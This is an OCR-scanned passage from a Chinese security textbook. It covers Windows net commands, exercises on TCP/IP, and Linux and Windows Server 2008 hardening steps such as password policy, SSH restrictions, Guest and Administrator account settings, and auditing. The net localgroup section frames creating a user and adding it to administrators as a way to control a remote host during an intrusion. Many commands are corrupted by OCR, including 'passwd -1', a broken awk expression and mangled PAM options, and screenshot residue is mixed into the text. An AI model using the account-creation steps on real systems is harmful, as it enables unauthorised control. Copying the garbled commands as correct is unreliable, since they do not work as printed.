查看 所 有 和 用 户 组 有 关 的 信息 和 进行 相关 操作 。 输 入 不 带 参 数 的 net localgroup 即 列 
出 当前 所 有 的 用 户 组 ,如 图 2-19 所 示 。 


rator?net start telnet 


C:\Documents and Settings \Adninistrator net localgroup 


NXPRC-20131004NUU 的 别名 


nfiguration Operators 


|«Remote Desktop Users 
I«Replicator 


and Settings\hdnm: 


图 2-19 显示 当前 所 有 的 用 户 组 
在 人 侵 过 程 中 ,一 般 利用 它 来 把 某 个 账户 提升 为 administrators 组 账户 ,这 样 利 用 这 个 
账户 就 可 以 控制 整个 远程 主机 了 ,如 图 2-20 所 示 。 
用 法 : net localgroup groupname username /add 


步骤 : net user malimei 1234 /add 首先 用 上 面 的 方法 建立 一 个 用 户 , 名 字 为 malimei， 


net localgroup administrators malimei /add 把 malimei 用 户 加 入 到 administrators 超 
级 用 户 组 。 

net user malimei 查看 用 户 的 状态 。 

6. net time 

这 个 命令 可 以 查看 远程 主机 当前 的 时 间 。 如 果 你 的 目 * 只 是 进 Aan 主机 里 面 , 那 

么 也 许 就 用 不 到 这 个 命令 了 。 入 侵 成 功 后 ,需要 进一步 渗透 .这 就 需要 知道 远程 主机 当前 的 

时 间 。 

用 法 : net time \\IP, 见 图 2-21, 
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[C:\Documents and Settings Administratornet user nalimei 1234 /add 


and Settings MAdministrator?net localgroup admin 


[C:Documents and Settings\hdministrator>net user malimei 
pP 


nalinei 


2814/1729 FF 12:28 
20147/3713 L/F 11:16 
201471729 FF 12:28 
Y 


*fdnin 
d *None 
功 
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图 2-20 把 普通 用 户 加 入 到 超级 用 户 组 


and Settings\Adninistratornet time \\192.168.1.5 
2014/1729 下 午 12:43 


[C:\Documents and Settings Admin 


图 2-21 显示 远程 主机 的 时 间 
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习题 
一 、 选 择 题 
1. 通过 协议 ,主机 和 路 由 器 可 以 报告 错误 并 交换 相关 的 状态 信息 。 

A. IP B. TCP C. UDP D. ICMP 
2. 常用 的 网 络 服务 中 ,DNS 使 用 协议 。 

A. UDP B. TCP C. IP D. ICMP 
3. 网 际 协议 编号 为 6, 表 示 的 是 协议 。 

A. UDP B. TCP C. IP D. ICMP 
4 网际 协 议 编号 为 十 进 制 的 17, 表 示 的 是 协议 。 

A. IP B. TCP C. UDP D. ICMP 


二 、 简 答题 

1. 简 述 TCP 和 UDP 的 区 别 。 

2. 简 述 ping 命令 ipconfig 命令 netstat 命令 net 命令 的 功能 和 用 途 。 

3. 请 分 析 IP 头 部 : 45 00 00 30 52 52 40 00 80 06 2c 23 c0 a8 01 01 d8 03 e2 15, 
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第 3 章 操作 系统 安全 配置 


学 习 目标 : 
m 掌握 Linux 操作 系统 的 设置 。 
m 掌握 Windows 2008 Server 操作 系统 的 设置 。 


目前 服务 器 常用 的 操作 系统 有 三 类 : UNIX, Linux 和 Windows 2000/2003/2008 
Server。 这 些 操 作 系 统 都 是 符合 C2 级 安全 级 别 的 操作 系统 ,但 是 都 存在 不 少 漏洞 ,如 果 对 
这 些 漏 洞 不 了 解 ,不 采取 相应 的 安全 措施 ,就 会 使 操作 系统 完全 暴露 给 入 侵 者 。 


3.1 Linux 操作 系统 


3.1.1 Linux 操作 系统 介绍 


Linux 是 一 套 可 以 免费 使 用 和 自由 传播 的 类 UNIX 操作 系统 ,主要 用 于 基于 Intel x86 
系列 CPU 的 计算 机 上 。 这 个 系统 是 由 全 世界 各 地 的 成 千 上 万 的 程序 员 设 计 和 实现 的 ,其 
目的 是 建立 不 受 任何 商品 化 软件 的 版 权 制 约 的 ,全 世界 都 能 自由 使 用 的 UNIX 兼容 产品 。 
Linux 最 早 开始 于 一 位 名 叫 Linus Torvalds 的 计算 机 业余 爱好 者 ,当时 他 是 芬兰 赫尔辛基 
大 学 的 学 生 , 目 的 是 想 设计 一 个 代替 Minix( 是 由 一 位 名 叫 Andrew Tannebaum 的 计算 机 教 
授 编 写 的 一 个 操作 系统 示 教 程序 ) 的 操作 系统 。 这 个 操作 系统 可 用 于 386,486 或 奔腾 处 理 
器 的 个 人 计算 机 上 ,并 且 具 有 UNIX 操作 系统 的 全 部 功能 。Linux 是 一 个 免费 的 操作 系统 ， 
用 户 可 以 免费 获得 其 源 代码 ,并 能 够 随意 修改 。 

例如 ,搜索 1s 命令 源码 , 源 代码 包 的 文件 名 为 coreutils, 可 以 通过 命令 查找 ,获取 源 代 
码 的 步骤 如 下 。 

CD 先 搜 索 命令 所 在 包 , 命 令 如 下 : 

# which ls 

执行 结果 如 下 : 

/bin/1s 

(2) 用 命令 搜索 该 软件 所 在 包 , 代 码 如 下 : 

# dpkg -S /bin/ls 

执行 结果 如 下 : 

coreutils: /bin/ls 


(3) 下 载 包 , 包 的 名 字 为 coreutils-XXX. tar. gz XXX 表示 版 本 号 。 
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(4) 安装 解压 包 : 
# tar - xzvf coreutils - XXX. tar.gz 


(5) 显示 文件 名 字 ,看 到 主 文件 名 字 为 命令 (如 1s) 扩 展 名 为 . c 的 文件 。 

Linux 是 在 共用 许可 证 (General Public License,GPL) 保 护 下 的 自由 软件 ,也 有 多 种 版 
本 ,如 Red Hat Linux、Slackware, 以 及 国内 的 Xteam Linux、 红 弃 Linux 等 。Linux 的 流行 
是 因为 它 具 有 许多 优点 ,如 下 。 

(1) 完全 免费 。 

(2) 完全 兼容 POSIX 1.0 标准 ,为 一 个 POSIX 兼容 的 操作 系统 编写 的 程序 ,可 以 在 任 
何其 他 的 POSIX 操作 系统 (即使 是 来 自 另 一 个 厂商 ) 上 编译 执行 。 

(3) 多 用 户 ,多 任务 。 

(4) 良好 的 界面 。 

(5) 丰富 的 网 络 功 能 。 

(6) 可 靠 的 安全 ,稳定 性 能 。 

(7) 支持 多 种 平台 。 


3.1.2 Linux 安全 配置 


1. 磁盘 分 区 

如 果 是 新 安装 系统 ,对 磁盘 分 区 应 考虑 安全 性 。 

OD 引导 分 区 (/boot)、 系统 分 区 (/)、 交 换 分 区 (swap) .用 户 目录 (/home) 应 分 开放 到 
不 同 的 磁盘 分 区 。 

(2) 应 充分 考虑 以 上 各 目录 所 在 分 区 的 磁盘 空间 大 小 ,避免 因 某 些 原因 造成 分 区 空间 
用 完 而 导致 系统 崩溃 ,交换 分 区 为 物理 内 存 的 2 倍 。 

2. 账户 安全 

CD 锁定 系统 中 多 余 的 自 建 账号 。 

使 用 命令 passwd -1 所 用 户 名 二 锁定 不 必要 的 账号 。 

使 用 命令 passwd -u 去 用 户 名 二 解锁 需要 恢复 的 账号 。 

执行 命令 如 下 : 

# cat /etc/passwd 

# cat /etc/shadow 

查看 账户 口令 文件 ,与 系统 管理 员 确认 不 必要 的 账号 。 对 于 一 些 保留 的 系统 伪 账 户 如 
bin，sysvadm,uucp,lp，nuucp,.hpdb，www，daemon 等 可 根据 需要 锁定 登录 。 

(2) 设置 系统 口令 策略 。 


使 用 命令 如 下 : 

#cat /etc/login. defs|grep PASS 查看 密码 策略 设置 

#vi /etc/login. defs 修改 配置 文件 

PASS_MAX_DAYS 90 # 新 建 用 户 的 密码 最 长 使 用 天 数 90 天 
PASS MIN DAYS 0 # 新 建 用 户 的 密码 最 短 使 用 天 数 0 天 


PASS WARN AGE 7 # 新 建 用 户 的 密码 到 期 提前 提醒 天 数 7 天 
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PASS MIN LEN 9 # 最 小 密码 长 度 9 
(3) 限制 能 够 su 为 root 的 用 户 。 
检查 方法 : 


3 cat /etc/pan. d/su, 查看 是 否 有 auth required /1ib/security/pam_wheel. so 这 样 的 配置 条 目 。 
备份 方法 : #cp -p /etc/pam.d /etc/pam.d bak 
加 固 方法 : # vi /etc/pam. d/su 


在 头 部 添加 : 

auth required /lib/security/pam wheel.so group = wheel 
这 样 ,只 有 wheel 组 的 用 户 可 以 su 到 root, 

(4) 检查 shadow 中 空 口令 账号 。 

检查 方法 : 

#awk -F: '( $2 == "") ( print $1 }' /etc/shadow 

对 空 口令 账号 进行 锁定 ,或 要 求 增加 密码 。 

(5) 设置 账户 锁定 登录 失败 锁定 次 数 、 锁 定时 间 。 


# cat /etc/pam. d/system - auth 查看 有 无 auth required pam tally.so 条 目的 设置 。 
# vi /etc/pam. d/system — auth 


auth required pam_tally. so onerr— fail deny—6 unlock_time 一 300 设置 输入 密码 连续 
错误 6 次 锁定 ,锁定 时 间 300s 
(6) 修改 账户 TMOUT 值 ,设置 自动 注销 时 间 。 


#cat /etc/profile 查看 有 无 TMOUT 的 设置 。 
#vi /etc/profile 
TMOUT = 600 无 操作 600s 后 自动 退出 . 


(7) 设置 Bash 保留 历史 命令 的 条 数 。 


#cat /etc/profile|grep HISTSIZE = 
# cat /etc/profile| grep HISTFILESIZE = 查看 保留 历史 命令 的 条 数 。 
#vi /etc/profile 


修改 HISTSIZE—5 和 HISTFILESIZE— 5 即 保留 最 新 执行 的 5 条 命令 。 
3. 设置 合理 的 初始 文件 权限 
& cat /etc/profile 查看 umask 的 值 。 


d vi /etc/profile 
umask = 027 


修改 新 建文 件 的 默认 权限 ,如果 该 服务 器 是 Web 应 用 , 则 此 项 应 谨慎 修改 。 
4. 网 络 访问 控制 

(1) 使 用 SSH 进行 管理 。 

# ps - aef | grep sshd 查看 有 无 此 服务 。 
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使 用 命令 开启 ssh 服务 : 
# service sshd start 
(2) 设置 访问 控制 策略 ,限制 能 够 管理 本 机 的 IP 地 址 。 


$ cat /etc/ssh/sshd_config 查看 有 无 AllowUsers 的 语句 。 

# vi /etc/ssh/sshd config 添加 以 下 语句 。 

AllowUsers * (210.138. * . * 此 句 意 为 : 仅 允 许 10.138.0.0/16 网 段 所 有 用 户 通过 SSH 访问 。 
# service sshd restart 保存 后 重启 SSH 服务 。 


(3) 禁止 root 用 户 远程 登录 。 


t cat /etc/ssh/sshd config 查看 PermitRootLogin 是 否 为 no。 
d vi /etc/ssh/sshd config 

PermitRootLogin = no 

service sshd restart 保存 后 重启 SSH 服务 。 

root 用 户 无 法 直接 远程 登录 ,需要 用 普通 账号 登录 后 su。 

(4) 限定 信任 主机 。 

检查 方法 : 

# cat /etc/hosts. allow 查看 其 中 的 主机 。 

# vi /etc/hosts. allow 删除 其 中 不 必要 的 主机 。 

注意 : 在 多 机 互 备 的 环境 中 ,需要 保留 其 他 主机 的 IP 可 信任 。 
(5) 防止 误 使 用 Ctrl 十 Alt 十 Del 重启 系统 。 


# vi /etc/inittab 编辑 文件 。 

在 行 开 头 添加 注释 符号 " 井 ”: 

f callctrlaltdel:/sbin/shutdown — t3 -r now 
(6) 资源 限制 。 


对 你 的 系统 上 所 有 的 用 户 设置 资源 限制 可 以 防止 DoS 类 型 攻击 如 最 大 进程 数 、 内 存 数 
量 等 。 例 如 ,对 所 有 用 户 的 限制 : 
# vi /etc/security/limits.conf 加 : 


* hard rss 5000 
* hard nproc 20 


也 必须 编辑 /etc/pam. d/login 文件 加 上 session required /lib/security/pam limits. so 
这 一 行 。 
上 面 的 命令 限制 进程 数 为 20, 且 限制 内 存 使 用 为 5M。 


3.1.3 Linux 下 建议 替换 的 常见 网 络 服务 应 用 程序 


1. WuFTPD 

WuFTD 从 1994 年 就 开始 不 断 地 出 现 安全 漏洞 ,黑客 很 容易 就 可 以 获得 远程 root 访问 
的 权限 ,而 且 很 多 安全 漏洞 甚至 不 需要 在 FTP 服务 器 上 有 一 个 有 效 的 账号 。 最 近 , WuFTP 
也 是 频频 出 现 安全 漏洞 。 
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WuFTD 最 好 的 替代 程序 是 ProFTPD。ProFTPD 很 容易 配置 ,在 多 数 情 况 下 速度 也 
比较 快 ,而 且 它 的 源 代码 也 比较 干净 (缓冲 溢出 的 错误 比较 少 )。 有 许多 重要 的 站 点 使 用 
ProFTPD。sourceforge. net 就 是 一 个 很 好 的 例子 (这 个 站 点 共有 3 000 个 开放 源 代码 的 项 
目 , 其 负荷 并 不 小 )。 一 些 Linux 的 发 行商 在 它们 的 主 FTP 站 点 上 使 用 的 也 是 ProFTPD， 
只 有 两 个 主要 Linux 的 发 行商 (SuSE 和 Caldera) 使 用 WuFTPD。 

2. Telnet 


Telnet 是 非常 不 安全 的 , 它 用 明文 来 传送 密码 。 它 的 安全 的 替代 程序 是 OpenSSH. 

OpenSSH 在 Linux 上 已 经 非常 成 熟 和 稳定 了 ,而 且 在 Windows 平台 上 也 有 很 多 免费 
的 客户 端 软件 。Linux 的 发 行商 应 该 采用 OpenBSD 的 策略 : 安装 OpenSSH 并 把 它 设置 为 
默认 的 ,安装 Telnet 但 是 不 把 它 设置 成 默认 的 。 对 于 不 在 美国 的 Linux 发 行商 ,很 容易 就 
可 以 在 Linux 的 发 行 版 中 加 上 OpenSSH。 美 国 的 Linux 发 行商 就 要 想 一 些 别 的 办 法 了 ( 例 
如 ,Red Hat 在 德国 的 FTP 服务 器 上 (ftp. redhat. de) 就 有 最 新 的 OpenSSH 的 rpm 软 
件 包 ) 。 

Telnet 是 不 安全 的 程序 。 要 保证 系统 的 安全 必须 用 OpenSSH 这 样 的 软件 来 替代 它 。 


3. Sendmail 


最 近 这 些 年 ,Sendmail 的 安全 性 已 经 提高 了 很 多 (以 前 它 通常 是 黑客 重点 攻击 的 程 
序 )。 然 而 ,Sendmail 还 是 有 一 个 很 严重 的 问题 。 一 旦 出 现 了 安全 漏洞 (例如 ,最 近 出 现 的 
Linux 内 核 错误 ) ,Sendmail 就 是 被 黑客 重点 攻击 的 程序 ,因为 Sendmail 是 以 root 权限 运行 
而 且 代 码 很 庞大 容易 出 问题 。 

几乎 所 有 的 Linux 发 行商 都 把 Sendmail 作为 默认 的 配置 ,只 有 少数 几 个 把 Postfix 或 
Qmail 作为 可 选 的 软件 包 。 但 是 ,很 少 有 Linux 的 发 行商 在 自己 的 邮件 服务 器 上 使 用 
Sendmail。SuSE 和 Red Hat 都 使 用 基于 Qmail 的 系统 。 

Sendmail 并 不 一 定 会 被 别 的 程序 完全 替代 。 但 是 它 的 两 个 替代 程序 Qmail 和 Postfix 
都 比 它 安 全 .速度 快 ,而 且 特 别 是 Postfix 比 它 容易 配置 和 维护 。 

4. su 

su 是 用 来 改变 当前 用 户 的 ID ,转换 成 别 的 用 户 。 可 以 以 普通 用 户 登 录 , 当 需要 以 root 
身份 做 一 些 事 的 时 候 , 只 要 执行 “su 命令 ,然后 输入 root 的 密码 。su 本 身 是 没有 问题 的 ， 
但 是 它 会 让 人 养 成 不 好 的 习惯 。 如 果 一 个 系统 有 多 个 管理 员 ,必须 都 给 他 们 root 的 口 
令 。su 的 一 个 替代 程序 是 sudo, sudo 允许 用 户 设置 哪个 用 户 哪 个 组 可 以 以 root 身份 执行 
哪些 程序 。 还 可 以 根据 用 户 登 录 的 位 置 对 他 们 加 以 限制 (如 果 有 人 “ 破 ” 了 一 个 用 户 的 口令 ， 
并 用 这 个 账号 从 远程 计算 机 登录 ,可 以 限制 他 使 用 sudo)。Debian 也 有 一 个 类 似 的 程序 叫 
super。 使 用 root 账号 并 让 多 个 人 知道 root 的 密码 是 不 安全 的 ,这 就 是 www. apache. org 
被 入 侵 的 原因 ,因为 它 有 多 个 系统 管理 员 ,他们 都 有 root 的 特权 ,这 样 的 系统 是 很 容易 被 人 
侵 的 。 

5. named 

大 部 分 Linux 的 发 行商 都 解决 了 这 个 问题 。named 以 前 是 以 root 运行 的 ,因此 当 
named 出 现 新 的 漏洞 的 时 候 , 很 容易 就 可 以 人 侵 一 些 很 重要 的 计算 机 并 获得 root 权限 。 现 
在 只 要 用 命令 行 的 一 些 参数 就 能 让 named 以 非 root 的 用 户 运行 。 而且, 现在 绝 大 多 数 
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Linux 的 发 行商 都 让 named 以 普通 用 户 的 权限 运行 。 命 令 格式 通常 为 : 


named —u«user name»; - g< group name>; 
3.1.4 Linux 下 的 安全 守则 


(1) 删除 系统 所 有 默认 的 账号 和 密码 。 

(2) 在 用 户 合法 性 得 到 验证 前 不 要 显示 公司 题 头 、 在 线 帮助 以 及 其 他 信息 。 

(3) 关闭 “黑客 ”可 以 攻击 系统 的 网 络 服务 。 

(4) 使 用 6 一 8 位 的 字母 数字 混合 式 密码 。 

(5) 限制 用 户 尝试 登录 到 系统 的 次 数 。 

(6) 记录 违反 安全 性 的 情况 并 对 安全 记录 进行 复查 。 

(7) 对 于 重要 信息 ,上 网 传输 前 要 先进 行 加 密 。 

(8) 重视 专家 提出 的 建议 ,安装 他 们 推荐 的 系统 “补丁 ”。 

(9) 限制 不 需 密码 即 可 访问 的 主机 文件 。 

(10) 修改 网 络 配置 文件 ,以 便 将 来 自 外 部 的 TCP 连接 限制 到 最 少数 量 的 端口 。 不 允 
许 诸如 tftp.sunrpc. printer. rlogin 或 rexec 之 类 的 协议 。 

(11) 用 upas 代替 sendmail, sendmail 有 太 多 已 知 漏洞 ,很 难 修补 完全 。 

(12) 去 掉 对 操作 并 非 至 关 重 要 又 极 少 使 用 的 程序 。 

(13) 使 用 chmod 将 所 有 系统 目录 变更 为 711 模式 。 这 样 ,攻击 者 们 将 无 法 看 到 它们 当 
中 有 什么 东西 ,而 用 户 仍 可 执行 。 

(14) 只 要 可 能 ,就 将 磁盘 安装 为 只 读 模 式 。 其 实 , 仅 有 少数 目录 需 读 写 状 态 。 

(15) 将 系统 软件 升级 为 最 新 版 本 。 老 版 本 可 能 已 被 研究 并 被 成 功 攻击 ,最 新 版 本 一 般 
包括 了 这 些 问 题 的 补救 。 


3.2 Windows Server 2008 操作 系统 


Windows Server 2008 是 微软 公司 一 个 服务 器 操作 系统 的 名 称 。Windows Server 2008 
发 行 了 多 种 版 本 ,以 支持 各 种 规模 的 企业 对 服务 器 不 断 变 化 的 需求 。Windows Server 2008 
共有 包括 Standard Edition、Enterprise Edition、DataCenter Edition、Web Server Edition 等 
8 种 版 本 ,每 个 版 本 均 有 32 位 和 64 位 两 种 编码 。Windows 2003 对 硬件 的 最 低 要 求 不 高 ,和 
Windows Server 2003 相仿 。 


3.2.1 Windows Server 2008 的 特点 


1. 控制 力 

使 用 Windows Server 2008,IT 专业 人 员 能 够 更 好 地 控制 服务 器 和 网 络 基础 结构 ,从 而 
可 以 将 精力 集中 在 处 理 关 键 业务 需求 上 。 增 强 的 脚本 编写 功能 和 任务 自动 化 功能 (例如 ， 
Windows PowerShell) 可 帮助 IT 专业 人 员 自 动 执行 常见 IT 任务 。 通 过 服务 器 管理 器 进行 
的 基于 角色 的 安装 和 管理 简化 了 在 企业 中 管理 与 保护 多 个 服务 器 角色 的 任务 。 服 务 器 的 配 
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置 和 系统 信息 是 从 新 的 服务 器 管理 器 控制 台 这 一 集中 位 置 来 管理 的 。IT 人 员 可 以 仅 安装 
需要 的 角色 和 功能 ,向 导 会 自动 完成 许多 费时 的 系统 部 署 任务 。 增 强 的 系统 管理 工具 ( 例 
如 ,性 能 和 可 靠 性 监视 器 ) 提 供 有 关系 统 的 信息 ,在 潜在 问题 发 生 之 前 向 IT 人 员 发 出 警告 。 
在 Windows Server 2008 中 ,所 有 的 电源 管理 设置 已 被 组 策略 启用 ,这 样 就 潜在 地 节约 了 成 
本 。 控 制 电源 设置 通过 组 策略 可 以 大 量 节 省 公司 金钱 。 比 如 ,可 以 通过 修改 组 策略 设置 中 
特定 电源 的 设置 ,或 通过 使 用 组 策略 建立 一 个 定制 的 电源 计划 。 

2. 保护 

Windows Server 2008 提供 了 一 系列 新 的 和 改进 的 安全 技术 ,这 些 技术 增强 了 对 操作 
系统 的 保护 ,为 企业 的 运营 和 发 展商 定 了 坚实 的 基础 。Windows Server 2008 提供 了 减 小 
内 核 攻击 面 的 安全 创新 (例如 PatchGuard) ,因而 使 服务 器 环境 更 安全 、 更 稳定 。 通 过 保护 
关键 服务 器 服务 使 之 免 受 文件 系统 、 注 册 表 或 网 络 中 异常 活动 的 影响 ,Windows 服务 强化 
有 助 于 提高 系统 的 安全 性 。 借 助 网 络 访问 保护 (NAP) 、 只 读 域 控制 器 (RODC) 、 公 钥 基 础 结 
构 (PKD) 增 强 功 能 、Windows 服务 强化 、 新 的 双向 Windows 防火 墙 和 新 一 代 加 密 支 持 ， 
Windows Server 2008 操作 系统 中 的 安全 性 也 得 到 了 增强 。 

3. 灵活 性 

Windows Server 2008 的 设计 允许 管理 员 修 改 其 基础 结构 来 适应 不 断 变 化 的 业务 需 
求 ,同时 保持 了 此 操作 的 灵活 性 。 它 允许 用 户 从 远程 位 置 (如 远程 应 用 程序 和 终端 服务 网 
XO 执行 程序 ,这 一 技术 为 移动 工作 人 员 增 强 了 灵活 性 。Windows Server 2008 使 用 
Windows 部 署 服务 (WDS) 加 速 对 IT 系统 的 部 署 和 维护 ,使 用 Windows Server 虚拟 化 
(WSv) 帮 助 合并 服务 器 。 对 于 需要 在 分 支 机 构 中 使 用 域 控 制 器 的 组 织 , Windows Server 
2008 提供 了 一 个 新 配置 选项 : 只 读 域 控制 器 (RODC) , 它 可 以 防止 在 域 控 制 器 出 现 安 全 问 
题 时 暴露 用 户 账户 。 

3. 自修 复 系 统 

从 DOS 时 代 开 始 ,文件 系统 出 错 就 意味 着 相应 的 卷 必须 下 线 修复 ,而 在 Windows 
Server 2008 中 ,一 个 新 的 系统 服务 在 后 台 默 默 工作 ,检测 文件 系统 错误 ,并 且 可 以 在 无 须 关 
闭 服务 器 的 状态 下 自动 将 其 修复 。 有 了 这 一 新 服务 ,在 文件 系统 发 生 错误 的 时 候 , 服 务 器 只 
会 暂时 停止 无 法 访问 的 部 分 数据 ,整体 运行 基本 不 受 影响 .所 以 CHKDSK 基本 就 可 以 退 
休 了 。 

4. Session 创建 

如 果 有 一 个 终端 服务 器 系统 ,或 者 多 个 用 户 同 时 登录 了 家 庭 系统 ,这 些 就 是 Session. 
在 Windows Server 2008 之 前 ,Session 的 创建 都 是 逐一 操作 的 ,对 于 大 型 系统 而 言 就 是 个 
瓶颈 ,比如 周一 清晨 数 百 人 返回 工作 的 时 候 , 不 少 人 就 必须 等 待 Session 初始 化 。Vista 和 
Windows Server 2008 加 入 了 新 的 Session 模型 ,可 以 同时 发 起 至 少 4 个 Session ,而 如 果 服 
务 器 有 4 颗 以 上 的 处 理 器 ,还 可 以 同时 发 起 更 多 Session。 举 例 来 说 ,如 果 家 里 有 一 个 媒体 
中 心 , 那 各 个 家 庭 成 员 就 可 以 同时 在 各 自 的 房间 里 打开 媒体 终端 ,同时 从 Vista 服务 器 上 得 
到 视频 流 , 而 且 速 度 不 会 受到 影响 。 

5. 快速 关机 服务 

Windows 的 一 大 历史 问题 就 是 关机 过 程 缓慢 。 在 Windows XP 里 ,一 旦 关机 开始 , 系 
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统 就 会 开始 一 个 20s 的 计时 ,之 后 提醒 用 户 是 否 需要 手动 关闭 程序 ,而 在 Windows Server 
里 ,这 一 问题 的 影响 会 更 加 明显 。 到 了 Windows Server 2008.20s 的 倒计时 被 一 种 新 服务 
取代 ,可 以 在 应 用 程序 需要 被 关闭 的 时 候 随 时 、 一 直 发 出 信号 。 开 发 人 员 开 始 怀疑 这 种 新 方 
法 会 不 会 过 多 地 剥夺 应 用 程序 的 权利 .但 他 们 已 经 接受 了 它 , 认 为 这 是 值得 的 。 

6. UAC 

Windows Server 2008 操作 系统 和 Windows Vista 类 似 同 样 附带 了 UAC (User 
Account Control, 用 户 账户 控制 ), 可 以 有 效 降低 服务 器 的 风险 。 但 是 通过 Vista 地 带 适 用 
Windows 2008 的 系统 管理 员 账 户 并 没有 受到 像 Vista 一 样 的 限制 。 

7. 安全 

Windows Server 2008 的 IE7 具有 “增强 的 安全 配置 ”, 必 须 通 过 用 户 手 动 审核 才 可 以 打 
开 相 关 的 网 站 ,与 Windows Vista 相 比 安全 了 许多 。 


3.2.2 Windows Server 2008 安全 配置 


1. 停止 Guest 账号 

在 计算 机 管理 的 用 户 里 面 把 Guest 账号 停 用 ,任何 时 候 都 不 允许 Guest 账号 登录 系统 。 
为 了 保险 起 见 , 最 好 给 Guest 加 一 个 复杂 的 密码 ,可 以 打开 记事 本 ,在 里 面 输入 一 串 包含 特 
殊 字 符 .数字 .字母 的 长 字符 串 , 用 它 作为 Guest 账号 的 密码 ,并且 修改 Guest 账号 的 属性 ， 
设置 拒绝 远程 访问 ,如 图 3-1 所 示 。 


3-1 设置 Guest 账号 属性 


2. 管理 员 账号 改名 
Windows 2008 中 的 Administrator 账号 是 不 能 被 停 用 的 ,这 意味 着 别人 可 以 一 遍 又 一 
遍地 尝试 这 个 账户 的 密码 。 把 Administrator 账户 改名 可 以 有 效 地 防止 这 一 点 。 不 要 使 用 
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Admin 之 类 的 名 字 , 改 了 等 于 没 改 ,应 尽量 把 它 伪装 成 普通 用 户 ,比如 改 成 guestone。 具 体 
操作 的 时 候 只 要 选中 账户 名 改名 就 可 以 了 ,如 图 3-2 所 示 。 


计算 机 管理 


图 3-2 修改 Administrator 账号 


3. 陷阱 账号 

所 谓 的 陷阱 账号 是 创建 一 个 名 为 “Administrator” 的 本 地 账户 ,把 它 的 权限 设置 成 最 
低 , 什 么 事 也 干 不 了 ,并 且 加 上 一 个 超过 10 位 的 超级 复杂 密码 ,这样 可 以 让 那些 企图 人 侵 者 
忙 上 一 段 时 间 了 ,并 且 可 以 借 此 发 现 他 们 的 入 侵 企图 。 可 以 将 该 用 户 隶 属 的 组 修改 成 
Guests 组 ,如 图 3-3 所 示 。 


图 3-3 修改 用 户 隶 属 的 组 


4. 安全 策略 

利用 Windows 2008 的 安全 配置 工具 来 配置 安全 策略 ,微软 提供 了 一 套 基 于 管理 控制 
人 台 的 安全 配置 和 分 析 工 具 , 可 以 配置 服务 器 的 安全 策略 。 在 管理 工具 中 可 以 找到 “本 地 安全 
策略 ”, 主 界面 如 图 3-4 所 示 , 可 以 配置 6 类 安全 策略 : 账户 策略 、 本 地 策略 、 高 级 安全 
Windows 防火 墙 . 公 钥 策略 ,软件 限制 策略 和 IP 安全 策略 。 在 默认 的 情况 下 ,这 些 策略 都 
是 没有 开启 的 。 

5. 设置 本 机 开放 的 端口 和 服务 

CD 单 击 “ 控 制 面板 ”>“ 管 理工 具 ”, 打 开 “ 本 地 安全 策略 ”"。 在 左边 栏 单 击 “IP 安全 策 
略 ,在 本 地 计算 机 ”, 然 后 在 右边 的 空白 处 右 击 ,选择 “创建 IP 安全 策略 ”, 将 弹出 “IP 安全 策 
略 向 导 ” 窗 口 ,如 图 3-5 所 示 。 
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图 3-5 创建 本 地 安全 策略 


(2) 单 击 “下 一 步 ?按钮 ,填写 名 称 * 禁 用 80 端口 策略 ”, 然 后 下 一 步 , 不 要 改动 ,继续 下 
一 步 , 单 击 “ 完 成 "按钮 。 

G) 系统 弹出 “属性 ”对 话 框 。 取 消 右 下 角 *“ 使 用 添加 向 导 ” 的 勾 选 ,然后 再 单 击 “ 添 加 ”， 
随后 弹出 “新 规则 属性 "对话 框 , 单 击 “ 添 加 ”, 又 弹出 了 “IP 筛选 列表 ”, 填 写 名称 * 禁 用 80 端 
口 ”, 在 页 面 中 取消 “使 用 添加 向 导 ” 的 勾 选 , 然 后 单 击 “ 添 加 ”, 将 弹出 IP 筛选 器 属性 ”。 

CD 进入 “筛选 器 属性 ”对 话 框 , 源 地 址 选择 “任何 IP 地 址 ”, 目 标 地 址 选择 “我 的 IP 地 
址 ”。 接 下 来 单 击 “ 协 议 ” 标 签 ,在 “选择 协议 类 型 "中 选择 TCP, 到 此 端口 填 "80”, 接 着 单 击 
“描述 ”标签 ,填写 描述 “禁用 80”, 单 击 “ 确 定 ” 按 钮 。 

(5) 在 “新 规则 属性 ”对 话 框 中 ,选中 “禁用 80 端口 ?然后 单 击 其 左边 的 复 选 框 ,表示 已 
经 激活 。 然 后 单 击 “ 筛 选 器 操作 ”标签 ,取消 “使 用 添加 向 导 ” 的 勾 选 , 单 击 “ 添 加 ”按钮 ,在 “新 
筛选 器 操作 属性 ”的 “安全 方法 ”选项 卡 中 ,选择 “阻止 ”, 然 后 单 击 “ 确 定 ” 按 钮 。 接 着 单 击 “ 阻 
止 操 作 ” 左 边 的 复 选 框 ,然后 单 击 “ 确 定 ” 按 钮 。 

(6) 最 后 打开 “新 IP. 安全 策略 属性 ”对 话 框 ,在 “禁用 80 端口 策略 ”左边 打 勾 ,确定 关闭 
对 话 框 。 在 “本 地 安全 策略 "窗口 中 ,鼠标 右 击 新 添加 的 IP 安全 策略 ,然后 选择 “分 配 ”。 

6. 开启 审核 策略 


安全 审核 是 Windows 2008 最 基本 的 入 侵 检 测 方法 。 当 有 人 尝试 对 系统 进行 某 种 方式 
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(如 尝试 用 户 密码 ,改变 账户 策略 和 未 经 许可 的 文件 访问 等 ) 入 侵 的 时 候 ,都 会 被 安全 审核 记 
录 下 来 。 很 多 的 管理 员 在 系统 被 入侵 了 几 个 月 后 都 不 知道 ,直到 系统 遭 到 破坏 。 表 3-1 的 
这 些 审核 是 必须 开启 的 ,其 他 的 可 以 根据 需要 增加 。 


表 3-1 开启 审核 策略 的 设置 


策 g 安全 设置 策 g 安全 设置 
审核 策略 更 改 成 功 , 失 败 审核 特权 使 用 成 功 , 失 败 
审核 登录 事件 成 功 , 失 败 审核 系统 事件 成 功 , 失 败 
审核 对 象 访问 成 功 , 失 败 审核 账户 登录 事件 成 功 , 失 败 
审核 进程 跟踪 成 功 , 失 败 审核 账户 管理 成 功 , 失 败 


审核 目录 服务 访问 成 功 ,失败 


审核 策略 在 默认 的 情况 下 都 是 没有 开启 的 ,如 图 3-6 所 示 。 双 击 审核 列表 的 某 一 项 ,出 
现 设置 对 话 框 ,将 复 选 框 “成 功 " 和 “失败 ”都 选中 ,如 图 3-7 所 示 。 


图 3-6 ”审核 策略 的 默认 设置 


审核 特权 使 用 属性 


图 3-7 审核 策略 的 设置 


7. 开启 账户 策略 


账户 锁定 策略 用 于 域 账户 或 本 地 用 户 账户 ,它们 确定 某 个 账户 被 系统 锁定 的 情况 和 时 
